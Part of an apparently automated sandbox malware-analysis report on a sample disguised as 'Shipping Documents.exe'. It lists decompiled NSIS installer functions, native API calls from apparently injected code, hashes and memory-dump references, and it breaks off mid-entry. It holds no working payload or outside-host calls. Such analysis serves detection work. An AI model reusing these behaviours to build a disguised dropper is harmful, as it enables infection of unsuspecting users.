                                          • CloseHandle.KERNEL32(000002C4,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040396F
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\nszCE87.tmp, xrefs: 0040397F
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040394E
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nszCE87.tmp
                                          • API String ID: 2962429428-1310383300
                                          • Opcode ID: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                                          • Instruction ID: e7b4e10e42ecc32fc510515b664fd575b34ef2c347d966a0cc54db6954a3096e
                                          • Opcode Fuzzy Hash: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                                          • Instruction Fuzzy Hash: 6AE08C71944B1896C130AF7CAD4E9953B1C9B413367244726F078F20F0C7789AA75AEE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004052C3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E004052C3(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x420d3c != _t16) {
							_push(_t16);
							_push(6);
							 *0x420d3c = _t16;
							E00404C7F();
						}
						L11:
						return CallWindowProcA( *0x420d44, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BFF(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004042F8(0x413);
				return 0;
			}





                                          0x004052c7
                                          0x004052d1
                                          0x004052ed
                                          0x0040530f
                                          0x00405312
                                          0x00405318
                                          0x00405322
                                          0x00405323
                                          0x00405325
                                          0x0040532b
                                          0x0040532b
                                          0x00405335
                                          0x00000000
                                          0x00405343
                                          0x004052fa
                                          0x00405332
                                          0x00405332
                                          0x00000000
                                          0x00405332
                                          0x00405306
                                          0x00405308
                                          0x00000000
                                          0x00405308
                                          0x004052d7
                                          0x00000000
                                          0x00000000
                                          0x004052de
                                          0x00000000

                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 004052F2
                                          • CallWindowProcA.USER32 ref: 00405343
                                            • Part of subcall function 004042F8: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040430A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                          • Instruction ID: 59df81840e01a834e8184741018ea8653580e9c1f0e113f815542439c818a584
                                          • Opcode Fuzzy Hash: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                          • Instruction Fuzzy Hash: 61017C71200608AFDF209F51DD81AAB3B66EB94394F50453BFA04761D1C7BA9C929F2D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405CAE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E00405CAE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406228(0x422158, _a4);
				_t21 = E00405C59(0x422158);
				if(_t21 != 0) {
					E00406503(_t21);
					if(( *0x42475c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x422158;
						while(1) {
							_t11 = lstrlenA(0x422158);
							_push(0x422158);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040659C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C07(0x422158);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC0();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                          0x00405cba
                                          0x00405cc5
                                          0x00405cc9
                                          0x00405cd0
                                          0x00405cdc
                                          0x00405ce8
                                          0x00405ce8
                                          0x00405d00
                                          0x00405d01
                                          0x00405d08
                                          0x00405d09
                                          0x00000000
                                          0x00000000
                                          0x00405cec
                                          0x00405cf3
                                          0x00405cfb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405cf3
                                          0x00405d0b
                                          0x00000000
                                          0x00405d1f
                                          0x00405cde
                                          0x00405ce2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405ce2
                                          0x00405ccb
                                          0x00000000

                                          APIs
                                            • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                            • Part of subcall function 00405C59: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560,00000000), ref: 00405C67
                                            • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                            • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszCE87.tmp,00000000,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560,00000000), ref: 00405D01
                                          • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,00000000,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560), ref: 00405D11
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\nszCE87.tmp
                                          • API String ID: 3248276644-2010284083
                                          • Opcode ID: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                          • Instruction ID: 810c58eff44cea92ea74d6fc536401bd0fed09a955b2fb282e84a1b8880da462
                                          • Opcode Fuzzy Hash: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                          • Instruction Fuzzy Hash: 31F0F921109F5125E62232761D09B9F1E54CD97324745457FF8A1B23D2CB3C8853DD6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040610F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E0040610F(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060AE(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                          0x0040611d
                                          0x0040611f
                                          0x00406137
                                          0x0040613c
                                          0x00406141
                                          0x0040617e
                                          0x0040617e
                                          0x00406143
                                          0x00406155
                                          0x00406160
                                          0x00406166
                                          0x00406170
                                          0x00000000
                                          0x00000000
                                          0x00406170
                                          0x00406183

                                          APIs
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,uvlcopdlxoed,00420530,?,?,?,00000002,uvlcopdlxoed,?,004063C4,80000002), ref: 00406155
                                          • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,uvlcopdlxoed,uvlcopdlxoed,uvlcopdlxoed,?,00420530), ref: 00406160
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseQueryValue
                                          • String ID: uvlcopdlxoed
                                          • API String ID: 3356406503-3939465813
                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                          • Instruction ID: a564c047acf5d73f9aa125f5b2549426a44a408a2c37113ac8a3848fd8f43ee5
                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                          • Instruction Fuzzy Hash: 8B015A72500209BBDF228F61CC0AFDB3BA8EF55364F01403AF95AA6191D678D964DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004058C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004058C7(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422558->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x422558,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                          0x004058d0
                                          0x004058f0
                                          0x004058f8
                                          0x004058fd
                                          0x00000000
                                          0x00405903
                                          0x00405907

                                          APIs
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422558,Error launching installer), ref: 004058F0
                                          • CloseHandle.KERNEL32(?), ref: 004058FD
                                          Strings
                                          • Error launching installer, xrefs: 004058DA
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                          • Instruction ID: 5185fe82c3568d3c8632712b5ff5a6750f12376067ae41ef0f6fc1d41a32777d
                                          • Opcode Fuzzy Hash: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                          • Instruction Fuzzy Hash: D6E0BFF4A00209BFEB109F64ED09F7B77ACEB04644F508425BE51F2150D77899658A78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405C07, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405C07(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                          0x00405c08
                                          0x00405c12
                                          0x00405c14
                                          0x00405c1b
                                          0x00405c23
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405c23
                                          0x00405c25
                                          0x00405c2a

                                          APIs
                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\202139769574 Shipping Documents.exe,C:\Users\user\Desktop\202139769574 Shipping Documents.exe,80000000,00000003), ref: 00405C0D
                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\202139769574 Shipping Documents.exe,C:\Users\user\Desktop\202139769574 Shipping Documents.exe,80000000,00000003), ref: 00405C1B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\Desktop
                                          • API String ID: 2709904686-224404859
                                          • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                          • Instruction ID: 741041d8a9fca0cd730fa631f59021aaf6e5318b071c559ffeb457c432b97b3b
                                          • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                          • Instruction Fuzzy Hash: 09D0C77241DA706EF70363149D05B9F6A48DF57700F1A44A6E581A6191C77C4C524BFD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405D26, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405D26(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                          0x00405d36
                                          0x00405d38
                                          0x00405d3b
                                          0x00405d67
                                          0x00405d40
                                          0x00405d49
                                          0x00405d4e
                                          0x00405d59
                                          0x00405d5c
                                          0x00405d78
                                          0x00405d5e
                                          0x00405d65
                                          0x00000000
                                          0x00405d65
                                          0x00405d71
                                          0x00405d75
                                          0x00405d75
                                          0x00405d6f
                                          0x00000000

                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                          • CharNextA.USER32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                          • Instruction ID: 00b114ba7cac9785f06d25343f2ff2c8ce87c9cf7580b170eb884579fc1bcc0a
                                          • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                          • Instruction Fuzzy Hash: 45F0F631100818BFCB02DFA4CD04D9EBBA8EF55354B2580BBE840FB210D634DE01AFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: 202139769574 Shipping Documents.exe PID: 6808 Parent PID: 6728 202139769574 Shipping Documents.exeCOMMON

                                          Executed Functions

                                          Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: BMA$BMA
                                          • API String ID: 2738559852-2163208940
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                          • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                          • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                          • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 0c7d60e7bebb5450a9e95584f5b32a3406881caf65b91832c7cd0ba326786ff6
                                          • Instruction ID: 601d5f0c3bcf52e11414399372f39b4f8f15bc70102d4d24cb36216df394914d
                                          • Opcode Fuzzy Hash: 0c7d60e7bebb5450a9e95584f5b32a3406881caf65b91832c7cd0ba326786ff6
                                          • Instruction Fuzzy Hash: 5101E4B6200108BFCB48CF98CC95EEB37A9AF8C354F158248FA4D93241C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                          • Instruction ID: 38c60c9c5987a87ade63d86acf0ad3c52234d84a5a182d682657b57437046be7
                                          • Opcode Fuzzy Hash: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                          • Instruction Fuzzy Hash: C190026260100502E21171994404616044AD7D0381F91C076A102455DECAA589A2F171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                          • Instruction ID: 33d3b366108972303e3c52bfb089dde854f3d0e071710561d69626bfdc4f1fd3
                                          • Opcode Fuzzy Hash: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                          • Instruction Fuzzy Hash: 8890027220100413E221619945047070449D7D0381F91C466A042455CD96D68962F161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                                          • Instruction ID: f9270b7e0f82d6f1991b7aef2c8e4c4914d400f4d228e2201784994da99aba5e
                                          • Opcode Fuzzy Hash: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
